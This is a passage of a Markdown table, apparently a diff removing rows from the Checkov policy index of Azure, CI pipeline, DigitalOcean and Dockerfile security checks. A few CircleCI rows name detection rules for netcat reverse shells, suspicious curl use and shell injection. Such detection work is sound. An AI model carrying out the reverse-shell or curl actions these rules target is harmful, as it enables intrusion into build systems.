-| 2048 | CKV2_AZURE_22            | resource                         | azurerm_cognitive_account_customer_managed_key                                                   | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform               | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                       |
-| 2049 | CKV2_AZURE_23            | resource                         | Microsoft.AppPlatform/Spring                                                                     | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | arm                     | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml)                                                             |
-| 2050 | CKV2_AZURE_23            | resource                         | azurerm_spring_cloud_service                                                                     | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | Terraform               | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml)                                                 |
-| 2051 | CKV2_AZURE_24            | resource                         | azurerm_automation_account                                                                       | Ensure Azure automation account does NOT have overly permissive network access                                                                                                                           | Terraform               | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml)                 |
-| 2052 | CKV2_AZURE_25            | resource                         | azurerm_mssql_database                                                                           | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled                                                                                                                                   | Terraform               | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml)                           |
-| 2053 | CKV2_AZURE_26            | resource                         | azurerm_postgresql_flexible_server_firewall_rule                                                 | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access                                                                                                          | Terraform               | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml)                     |
-| 2054 | CKV2_AZURE_27            | resource                         | Microsoft.Sql/servers                                                                            | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | arm                     | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                                           |
-| 2055 | CKV2_AZURE_27            | resource                         | Microsoft.Sql/servers                                                                            | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Bicep                   | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                                           |
-| 2056 | CKV2_AZURE_27            | resource                         | azurerm_mssql_server                                                                             | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Terraform               | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml)                                                                 |
-| 2057 | CKV2_AZURE_28            | resource                         | azurerm_container_group                                                                          | Ensure Container Instance is configured with managed identity                                                                                                                                            | Terraform               | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml)                       |
-| 2058 | CKV2_AZURE_29            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster has Azure CNI networking enabled                                                                                                                                                      | Terraform               | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml)                                                 |
-| 2059 | CKV2_AZURE_30            | resource                         | azurerm_container_registry_webhook                                                               | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook                                                                                                                                      | Terraform               | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml)                                                                   |
-| 2060 | CKV2_AZURE_31            | resource                         | azurerm_subnet                                                                                   | Ensure VNET subnet is configured with a Network Security Group (NSG)                                                                                                                                     | Terraform               | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml)                                                             |
-| 2061 | CKV2_AZURE_32            | resource                         | azurerm_key_vault                                                                                | Ensure private endpoint is configured to key vault                                                                                                                                                       | Terraform               | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml)                                         |
-| 2062 | CKV2_AZURE_33            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured with private endpoint                                                                                                                                               | Terraform               | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml)                             |
-| 2063 | CKV2_AZURE_34            | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure Azure SQL server firewall is not overly permissive                                                                                                                                                | Terraform               | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml)                                           |
-| 2064 | CKV2_AZURE_35            | resource                         | azurerm_recovery_services_vault                                                                  | Ensure Azure recovery services vault is configured with managed identity                                                                                                                                 | Terraform               | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml)               |
-| 2065 | CKV2_AZURE_36            | resource                         | azurerm_automation_account                                                                       | Ensure Azure automation account is configured with managed identity                                                                                                                                      | Terraform               | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml)                               |
-| 2066 | CKV2_AZURE_37            | resource                         | azurerm_mariadb_server                                                                           | Ensure Azure MariaDB server is using latest TLS (1.2)                                                                                                                                                    | Terraform               | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml)                                                 |
-| 2067 | CKV2_AZURE_38            | resource                         | azurerm_storage_account                                                                          | Ensure soft-delete is enabled on Azure storage account                                                                                                                                                   | Terraform               | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml)                                       |
-| 2068 | CKV2_AZURE_39            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 2069 | CKV2_AZURE_39            | resource                         | azurerm_network_interface                                                                        | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 2070 | CKV2_AZURE_39            | resource                         | azurerm_virtual_machine                                                                          | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 2071 | CKV2_AZURE_39            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 2072 | CKV2_AZURE_40            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is not configured with Shared Key authorization                                                                                                                                   | Terraform               | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml)                                         |
-| 2073 | CKV2_AZURE_41            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured with SAS expiration policy                                                                                                                                          | Terraform               | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml)                                 |
-| 2074 | CKV2_AZURE_42            | resource                         | azurerm_postgresql_server                                                                        | Ensure Azure PostgreSQL server is configured with private endpoint                                                                                                                                       | Terraform               | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml)                                     |
-| 2075 | CKV2_AZURE_43            | resource                         | azurerm_mariadb_server                                                                           | Ensure Azure MariaDB server is configured with private endpoint                                                                                                                                          | Terraform               | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml)                                           |
-| 2076 | CKV2_AZURE_44            | resource                         | azurerm_mysql_server                                                                             | Ensure Azure MySQL server is configured with private endpoint                                                                                                                                            | Terraform               | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml)                                               |
-| 2077 | CKV2_AZURE_45            | resource                         | azurerm_mssql_server                                                                             | Ensure Microsoft SQL server is configured with private endpoint                                                                                                                                          | Terraform               | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml)                                               |
-| 2078 | CKV2_AZURE_46            | resource                         | azurerm_synapse_workspace_security_alert_policy                                                  | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform               | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                             |
-| 2079 | CKV2_AZURE_46            | resource                         | azurerm_synapse_workspace_vulnerability_assessment                                               | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform               | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                             |
-| 2080 | CKV2_AZURE_47            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured without blob anonymous access                                                                                                                                       | Terraform               | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml)               |
-| 2081 | CKV_AZUREPIPELINES_1     | azure_pipelines                  | jobs                                                                                             | Ensure container job uses a non latest version tag                                                                                                                                                       | Azure Pipelines         | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py)                                                                                      |
-| 2082 | CKV_AZUREPIPELINES_1     | azure_pipelines                  | stages[].jobs[]                                                                                  | Ensure container job uses a non latest version tag                                                                                                                                                       | Azure Pipelines         | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py)                                                                                      |
-| 2083 | CKV_AZUREPIPELINES_2     | azure_pipelines                  | jobs                                                                                             | Ensure container job uses a version digest                                                                                                                                                               | Azure Pipelines         | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py)                                                                                            |
-| 2084 | CKV_AZUREPIPELINES_2     | azure_pipelines                  | stages[].jobs[]                                                                                  | Ensure container job uses a version digest                                                                                                                                                               | Azure Pipelines         | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py)                                                                                            |
-| 2085 | CKV_AZUREPIPELINES_3     | azure_pipelines                  | jobs[].steps[]                                                                                   | Ensure set variable is not marked as a secret                                                                                                                                                            | Azure Pipelines         | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py)                                                                                        |
-| 2086 | CKV_AZUREPIPELINES_3     | azure_pipelines                  | stages[].jobs[].steps[]                                                                          | Ensure set variable is not marked as a secret                                                                                                                                                            | Azure Pipelines         | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py)                                                                                        |
-| 2087 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | *.container[]                                                                                    | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                        |
-| 2088 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | jobs[]                                                                                           | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                        |
-| 2089 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | stages[].jobs[]                                                                                  | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                        |
-| 2090 | CKV_BCW_1                | provider                         | bridgecrew                                                                                       | Ensure no hard coded API token exist in the provider                                                                                                                                                     | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py)                                                                                          |
-| 2091 | CKV_BITBUCKET_1          | bitbucket_configuration          | *                                                                                                | Merge requests should require at least 2 approvals                                                                                                                                                       | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py)                                                                                    |
-| 2092 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | [{image:image,__startline__:__startline__,__endline__:__endline__}]                              | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                  |
-| 2093 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                  |
-| 2094 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}   | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                  |
-| 2095 | CKV_CIRCLECIPIPELINES_1  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | circleci_pipelines      | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py)                                                                                                   |
-| 2096 | CKV_CIRCLECIPIPELINES_2  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Ensure the pipeline image version is referenced via hash not arbitrary tag.                                                                                                                              | circleci_pipelines      | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py)                                                                               |
-| 2097 | CKV_CIRCLECIPIPELINES_3  | circleci_pipelines               | orbs.{orbs: @}                                                                                   | Ensure mutable development orbs are not used.                                                                                                                                                            | circleci_pipelines      | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py)                                                                           |
-| 2098 | CKV_CIRCLECIPIPELINES_4  | circleci_pipelines               | orbs.{orbs: @}                                                                                   | Ensure unversioned volatile orbs are not used.                                                                                                                                                           | circleci_pipelines      | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py)                                                                                 |
-| 2099 | CKV_CIRCLECIPIPELINES_5  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Suspicious use of netcat with IP address                                                                                                                                                                 | circleci_pipelines      | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py)                                                                                       |
-| 2100 | CKV_CIRCLECIPIPELINES_6  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | circleci_pipelines      | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py)                                                                                               |
-| 2101 | CKV_CIRCLECIPIPELINES_7  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Suspicious use of curl in run task                                                                                                                                                                       | circleci_pipelines      | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py)                                                                                     |
-| 2102 | CKV_CIRCLECIPIPELINES_8  | circleci_pipelines               | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}       | Detecting image usages in circleci pipelines                                                                                                                                                             | circleci_pipelines      | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py)                                                                                         |
-| 2103 | CKV_CIRCLECIPIPELINES_8  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Detecting image usages in circleci pipelines                                                                                                                                                             | circleci_pipelines      | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py)                                                                                         |
-| 2104 | CKV_DIO_1                | resource                         | digitalocean_spaces_bucket                                                                       | Ensure the Spaces bucket has versioning enabled                                                                                                                                                          | Terraform               | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py)                                                                  |
-| 2105 | CKV_DIO_2                | resource                         | digitalocean_droplet                                                                             | Ensure the droplet specifies an SSH key                                                                                                                                                                  | Terraform               | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py)                                                                                  |
-| 2106 | CKV_DIO_3                | resource                         | digitalocean_spaces_bucket                                                                       | Ensure the Spaces bucket is private                                                                                                                                                                      | Terraform               | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py)                                                                  |
-| 2107 | CKV_DIO_4                | resource                         | digitalocean_firewall                                                                            | Ensure the firewall ingress is not wide open                                                                                                                                                             | Terraform               | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py)                                                                        |
-| 2108 | CKV_DOCKER_1             | dockerfile                       | EXPOSE                                                                                           | Ensure port 22 is not exposed                                                                                                                                                                            | dockerfile              | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py)                                                                                                           |
-| 2109 | CKV_DOCKER_2             | dockerfile                       | *                                                                                                | Ensure that HEALTHCHECK instructions have been added to container images                                                                                                                                 | dockerfile              | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py)                                                                                                 |
-| 2110 | CKV_DOCKER_3             | dockerfile                       | *                                                                                                | Ensure that a user for the container has been created                                                                                                                                                    | dockerfile              | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py)                                                                                                               |
-| 2111 | CKV_DOCKER_4             | dockerfile                       | ADD                                                                                              | Ensure that COPY is used instead of ADD in Dockerfiles                                                                                                                                                   | dockerfile              | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py)                                                                                                                 |
-| 2112 | CKV_DOCKER_5             | dockerfile                       | RUN                                                                                              | Ensure update instructions are not use alone in the Dockerfile                                                                                                                                           | dockerfile              | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py)                                                                                                       |
-| 2113 | CKV_DOCKER_6             | dockerfile                       | MAINTAINER                                                                                       | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated)                                                                                                                                  | dockerfile              | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py)                                                                                                   |
-| 2114 | CKV_DOCKER_7             | dockerfile                       | FROM                                                                                             | Ensure the base image uses a non latest version tag                                                                                                                                                      | dockerfile              | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py)                                                                                               |
-| 2115 | CKV_DOCKER_8             | dockerfile                       | USER                                                                                             | Ensure the last USER is not root                                                                                                                                                                         | dockerfile              | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py)                                                                                                                   |
-| 2116 | CKV_DOCKER_9             | dockerfile                       | RUN                                                                                              | Ensure that APT isn't used                                                                                                                                                                               | dockerfile              | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py)                                                                                                             |
-| 2117 | CKV_DOCKER_10            | dockerfile                       | WORKDIR                                                                                          | Ensure that WORKDIR values are absolute paths                                                                                                                                                            | dockerfile              | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py)                                                                                                 |
-| 2118 | CKV_DOCKER_11            | dockerfile                       | FROM                                                                                             | Ensure From Alias are unique for multistage builds.                                                                                                                                                      | dockerfile              | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py)                                                                                                         |
-| 2119 | CKV2_DOCKER_1            | resource                         | RUN                                                                                              | Ensure that sudo isn't used                                                                                                                                                                              | dockerfile              | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml)                                                                                          |
-| 2120 | CKV2_DOCKER_2            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with curl                                                                                                                                              | dockerfile              | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml)                                                                                        |
-| 2121 | CKV2_DOCKER_3            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with wget                                                                                                                                              | dockerfile              | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml)                                                                                        |
-| 2122 | CKV2_DOCKER_4            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option                                                                                                                   | dockerfile              | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml)                                                                                |
-| 2123 | CKV2_DOCKER_5            | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                          |
-| 2124 | CKV2_DOCKER_5            | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                          |
-| 2125 | CKV2_DOCKER_5            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                          |
-| 2126 | CKV2_DOCKER_6            | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                          |
-| 2127 | CKV2_DOCKER_6            | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                          |
-| 2128 | CKV2_DOCKER_6            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                          |
-| 2129 | CKV2_DOCKER_7            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option                                                                                         | dockerfile              | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml)                                                                          |
-| 2130 | CKV2_DOCKER_8            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option                                                                               | dockerfile              | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml)                                                        |
-| 2131 | CKV2_DOCKER_9            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option                                                                            | dockerfile              | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml)                                                                                  |
-| 2132 | CKV2_DOCKER_10           | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options                                           | dockerfile              | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml)                                                                                |
-| 2133 | CKV2_DOCKER_11           | resource                         | RUN                                                                                              | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                  | dockerfile              | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml)                                                                                |
-| 2134 | CKV2_DOCKER_12           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                        |
-| 2135 | CKV2_DOCKER_12           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                        |
